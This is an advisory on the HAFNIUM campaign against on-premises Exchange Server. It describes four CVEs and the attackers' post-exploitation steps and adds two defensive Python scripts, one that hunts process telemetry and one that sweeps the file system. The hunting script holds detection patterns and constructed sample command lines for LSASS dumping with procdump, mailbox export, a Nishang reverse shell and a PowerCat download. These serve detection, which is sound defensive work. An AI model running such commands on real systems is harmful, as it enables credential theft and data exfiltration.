Microsoft has detected multiple zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. Microsoft attributes the attacks to a group called HAFNIUM, which, based on the observed TTPs, it assesses to be funded by the Chinese government and operating out of China.
HAFNIUM mainly targets entities in multiple industries in the United States, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and non-governmental organizations.
In this campaign, Microsoft observed HAFNIUM interacting with victims' Office 365 tenants. Although these attempts usually fail to compromise customer accounts, the reconnaissance helps the attackers gather more information about the target environment.
Microsoft provides the following information to help customers understand the techniques behind these vulnerabilities and defend more effectively against future attacks on unpatched systems:
- CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
- CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when untrusted user-controllable data is deserialized by a program. Using this vulnerability, HAFNIUM can run code as SYSTEM on the Exchange server. Exploiting it requires administrator rights or another vulnerability.
- CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. Once HAFNIUM can authenticate to the Exchange server, they can use this vulnerability to write a file to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator's credentials.
- CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. Once HAFNIUM can authenticate to the Exchange server, they can use this vulnerability to write a file to any path on the server. They can authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate administrator's credentials.
After exploiting these vulnerabilities to gain initial access, HAFNIUM deployed web shells on the compromised server. A web shell lets the attacker steal data and perform other malicious actions, leading to further compromise. The following is an example of a web shell deployed by HAFNIUM, written in ASP:
After deploying the web shell, HAFNIUM performed the following post-exploitation activities:
- Used Procdump to dump the memory of the LSASS process:
- Used 7-Zip to compress the stolen data into a ZIP file for exfiltration:
- Added and used the Exchange PowerShell snap-in to export mailbox data:
- Used the Nishang Invoke-PowerShellTcpOneLine reverse shell:
- Downloaded PowerCat from GitHub and used it to open a connection to a remote server:
HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about the organization and its users.
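A defender-side way to hunt for the five post-exploitation activities listed above in process-creation telemetry (Windows Security event 4688 or Sysmon event 1, normalised to dicts). This is an added example, not Microsoft's or HAFNIUM's tooling; the sample events are constructed, the `EXAMPLE-OWNER` GitHub path and `example.invalid`-style placeholders are not real indicators, and the "IIS worker process spawning a command interpreter" heuristic is general web-shell detection knowledge rather than something the advisory states.

```python
import re

# Each rule: a tag and the regexes that must ALL match the lower-cased
# "image + command line" string of one process-creation event.
RULES = [
    # Procdump pointed at LSASS (credential dumping)
    ("procdump_lsass", [r"procdump(64)?\.exe", r"\blsass"]),
    # 7-Zip invoked with the 'a' (create archive) verb: staging for exfiltration
    ("7zip_archive", [r"\b7z(a|g)?\.exe\b", r"\ba\b"]),
    # Exchange snap-in loaded into an ad-hoc PowerShell, or a mailbox export request
    ("exchange_snapin_export",
     [r"powershell", r"add-pssnapin\s+microsoft\.exchange|new-mailboxexportrequest"]),
    # Nishang reverse shell, matched by its script/function name
    ("nishang_reverse_shell", [r"invoke-powershelltcponeline"]),
    # PowerCat being fetched from GitHub
    ("powercat_download", [r"powercat", r"github"]),
]

# Assumed heuristic (general knowledge, not from the advisory): an ASP/ASPX
# web shell executes inside the IIS worker process, so w3wp.exe spawning a
# command interpreter is a strong sign of web-shell command execution.
IIS_WORKER = "w3wp.exe"
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def classify_event(event):
    """Return the list of TTP tags an event matches; an empty list means nothing suspicious."""
    haystack = "{} {}".format(event.get("image", ""), event.get("command_line", "")).lower()
    tags = [tag for tag, patterns in RULES
            if all(re.search(p, haystack) for p in patterns)]
    if (_basename(event.get("parent_image", "")) == IIS_WORKER
            and _basename(event.get("image", "")) in INTERPRETERS):
        tags.append("iis_worker_spawned_shell")
    return tags


def hunt(events):
    """Return (time, host, tags) for every event that matched at least one rule."""
    hits = []
    for ev in events:
        tags = classify_event(ev)
        if tags:
            hits.append((ev["time"], ev["host"], tags))
    return hits


# Constructed telemetry for a hypothetical host EXCH01; not real indicators.
SAMPLE_EVENTS = [
    {"time": "2021-03-02T10:14:05Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"time": "2021-03-02T10:16:40Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\procdump64.exe",
     "command_line": "procdump64.exe -ma lsass.exe lsass.dmp"},
    {"time": "2021-03-02T10:20:11Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "command_line": r"7z.exe a C:\Users\Public\stolen.zip C:\Users\Public\exports\\"},
    {"time": "2021-03-02T10:25:02Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -nop -c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; '
                     'New-MailboxExportRequest -Mailbox <user> -FilePath <unc-share-path>"'},
    {"time": "2021-03-02T10:31:57Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop -File C:\Users\Public\Invoke-PowerShellTcpOneLine.ps1"},
    {"time": "2021-03-02T10:33:20Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -c "Invoke-WebRequest -Uri https://github.com/EXAMPLE-OWNER/powercat/raw/master/powercat.ps1 -OutFile C:\Users\Public\powercat.ps1"'},
    # Benign activity that must not fire
    {"time": "2021-03-02T11:00:00Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
    {"time": "2021-03-02T11:05:00Z", "host": "EXCH01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe", "command_line": r"7z.exe x backup.7z -oC:\Restore"},
]

if __name__ == "__main__":
    for when, host, tags in hunt(SAMPLE_EVENTS):
        print(when, host, ", ".join(tags))
```

The rules are deliberately coarse string matches so they are easy to port into a SIEM query; in production, baseline the `exchange_snapin_export` rule against legitimate administrator activity, since the Exchange snap-in and mailbox export requests are also used for normal operations.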
Web shell paths:
Exchange Server installation paths:
Web shell file names:
Paths for LSASS dumps:
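A file-system sweep for the two kinds of on-disk artefact the indicator sections above refer to: server-side script files (the form a deployed ASP/ASPX web shell takes) and memory dump files (the form an LSASS dump takes) that appeared or changed recently under the directories you point it at. This is an added example, not Microsoft's tooling; the directory names, file names and contents it creates for its demo run are constructed placeholders, not the indicators from the original advisory, and in a real sweep the roots would be the Exchange installation and web-root paths from that list.

```python
import hashlib
import os
import tempfile
import time

# File types worth flagging when they appear or change unexpectedly.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}   # IIS executes these server-side
DUMP_EXTS = {".dmp"}                                 # memory dumps such as an LSASS dump


def sha256_of(path):
    """Hash a file in chunks so a large dump is not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def find_recent_artifacts(roots, since_epoch):
    """Walk each root and return (kind, path, mtime, sha256) for script files and
    memory dumps modified at or after since_epoch, sorted by path."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                ext = os.path.splitext(name)[1].lower()
                if ext in SCRIPT_EXTS:
                    kind = "script"
                elif ext in DUMP_EXTS:
                    kind = "dump"
                else:
                    continue
                full = os.path.join(dirpath, name)
                mtime = os.stat(full).st_mtime
                if mtime >= since_epoch:
                    findings.append((kind, full, mtime, sha256_of(full)))
    return sorted(findings, key=lambda f: f[1])


# Constructed demo content: placeholders, not real web-shell or dump bytes.
DEMO_OLD_SCRIPT = b'<%@ Page Language="C#" %><!-- long-standing, expected file -->\n'
DEMO_NEW_SCRIPT = b'<%@ Page Language="C#" %><!-- constructed placeholder for an unexpected file -->\n'
DEMO_DUMP = b"constructed placeholder bytes, not a real memory dump\n"


def build_demo_tree():
    """Create a throwaway tree standing in for a web root and a temp folder;
    returns (base, cutoff) where cutoff is seven days ago."""
    base = tempfile.mkdtemp(prefix="exch_sweep_")
    now = time.time()
    web = os.path.join(base, "wwwroot", "placeholder_app")   # placeholder for the real web root
    tmp = os.path.join(base, "temp")                         # placeholder for a dump drop folder
    os.makedirs(web)
    os.makedirs(tmp)
    old = os.path.join(web, "expected_page.aspx")
    with open(old, "wb") as f:
        f.write(DEMO_OLD_SCRIPT)
    ninety_days_ago = now - 90 * 86400
    os.utime(old, (ninety_days_ago, ninety_days_ago))        # legitimate, untouched for months
    with open(os.path.join(web, "unexpected_page.aspx"), "wb") as f:
        f.write(DEMO_NEW_SCRIPT)                               # written just now
    with open(os.path.join(tmp, "unexpected.dmp"), "wb") as f:
        f.write(DEMO_DUMP)                                     # written just now
    with open(os.path.join(tmp, "notes.txt"), "wb") as f:
        f.write(b"ignored: neither a script nor a dump\n")
    return base, now - 7 * 86400


if __name__ == "__main__":
    base, cutoff = build_demo_tree()
    for kind, path, mtime, digest in find_recent_artifacts([base], cutoff):
        print(kind, time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime)), digest[:16], path)
```

The hashes let you compare a finding against a published indicator list or against a known-good copy of the same page from a freshly patched server; note that an attacker can reset modification times, so treat the mtime filter as a triage aid and also compare the script file set against a known-good inventory when possible.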